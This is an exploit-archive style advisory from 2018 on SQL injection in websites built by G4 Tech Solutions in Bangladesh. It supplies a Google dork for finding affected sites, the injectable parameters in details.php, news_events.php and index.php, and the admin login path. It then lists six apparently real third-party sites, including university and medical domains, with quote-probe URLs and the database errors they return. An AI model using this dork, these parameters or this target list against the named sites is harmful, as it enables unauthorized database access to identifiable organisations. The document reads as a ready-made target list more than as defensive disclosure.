facebook facebook twitter rss

Powered By G4 Tech Solutions Hosting Bangladesh SQL Injection Vulnerability

Author: KingSkrupellos , Published: 09-10-2018
# Exploit Title : Powered By G4 Tech Solutions Hosting Bangladesh SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Vendor Homepage : g4techsolution.com
# Google Dork : intext:''Powered by : G4 Tech Solutions''
# Tested On : Windows
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# CXSecurity : cxsecurity.com/ascii/WLB-2018090022

#################################################################################################

# Site Design & Developed by G4 Tech Solutions Bangladesh SQL Injection Vulnerability

# Admin Control Panel Path => /login.php

# Exploit :

/details.php?pid=[SQL Injection]

/news_events.php?page=[ID-NUMBER]&did=[SQL Injection]

/index.php?page=[SQL Injection]

#################################################################################################

# Example Site =>

1) msinternational.com.bd/details.php?pid=521%27 => [ Proof of Concept ] => archive.is/MYgm0

2) bubb.edu.bd/news_events.php?page=1&did=50%27

3) butphs.edu.bd/index.php?page=43

4) bum.edu.bd/index.php?page=4%27

5) ihcmedicalbd.com/gallery.php?gid=1%27

6) healthcaremedicalbd.com/index.php?page=18%27

# SQL Database Error =>

You have an error in your SQL syntax; check the manual that corresponds to your
MySQL server version for the right syntax to use near ''521'' ORDER BY seq ASC' at line 1

Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
/home/bub89ku/public_html/news_events.php on line 131

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :